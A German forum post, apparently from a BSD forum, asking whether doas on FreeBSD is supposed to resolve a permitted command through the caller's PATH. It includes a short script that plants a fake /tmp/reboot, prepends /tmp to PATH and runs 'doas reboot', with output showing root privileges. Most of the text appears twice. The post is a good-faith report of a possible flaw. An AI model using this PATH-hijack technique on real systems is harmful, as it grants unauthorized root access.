Im Thread https://www.bsdforen.de/threads/min...-verbindungstool-für-ethernet-und-wifi.33754/ bin ich über doas unter FreeBSD gestolpert und wollte es mir mal ansehen.
Ich empfand es komisch, dass wenn ich nur den Namen einer ausführbaren Datei in der doas.conf angebe, dies anscheinend für die erste Datei gilt die er im Pfad findet. Das schien mir ein Sicherheitsproblem zu sein woraufhin mich @mogbo auf folgende Seite hinwies: https://www.tedunangst.com/flak/post/doas-mastery
Genauer gesagt auf den Abschnitt:
doas will restrict itself to only executing commands in the system PATH (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin).
Quelle: https://www.tedunangst.com/flak/post/doas-mastery
https://www.tedunangst.com/flak/post/doas-mastery
Soweit so gut, also hab ich mal getestet.
Wenn meine doas.conf diese Zeile enthält:
Also wir gehen davon aus, dass operatoren einen Reboot machen dürfen.
Dann lege ich mir mal das folgende Script an:
und erhalte beim Ausführen folgende Angabe:
Mir sagt id doch direkt, dass ich mir hier root-rechte erschlichen habe.... Kann/darf/soll das so sein?
Ich empfand es komisch, dass wenn ich nur den Namen einer ausführbaren Datei in der doas.conf angebe, dies anscheinend für die erste Datei gilt die er im Pfad findet. Das schien mir ein Sicherheitsproblem zu sein woraufhin mich @mogbo auf folgende Seite hinwies: https://www.tedunangst.com/flak/post/doas-mastery
Genauer gesagt auf den Abschnitt:
doas will restrict itself to only executing commands in the system PATH (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin).
Quelle: https://www.tedunangst.com/flak/post/doas-mastery
https://www.tedunangst.com/flak/post/doas-mastery
Soweit so gut, also hab ich mal getestet.
Wenn meine doas.conf diese Zeile enthält:
Code:
permit nopass :operator cmd reboot
Also wir gehen davon aus, dass operatoren einen Reboot machen dürfen.
Dann lege ich mir mal das folgende Script an:
Code:
#!/bin/sh
echo -e "#!/bin/sh\necho Who am I?\nid" > /tmp/reboot
chmod 777 /tmp/reboot
PATH=/tmp:$PATH
doas reboot
und erhalte beim Ausführen folgende Angabe:
Code:
Who am I?
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Mir sagt id doch direkt, dass ich mir hier root-rechte erschlichen habe.... Kann/darf/soll das so sein?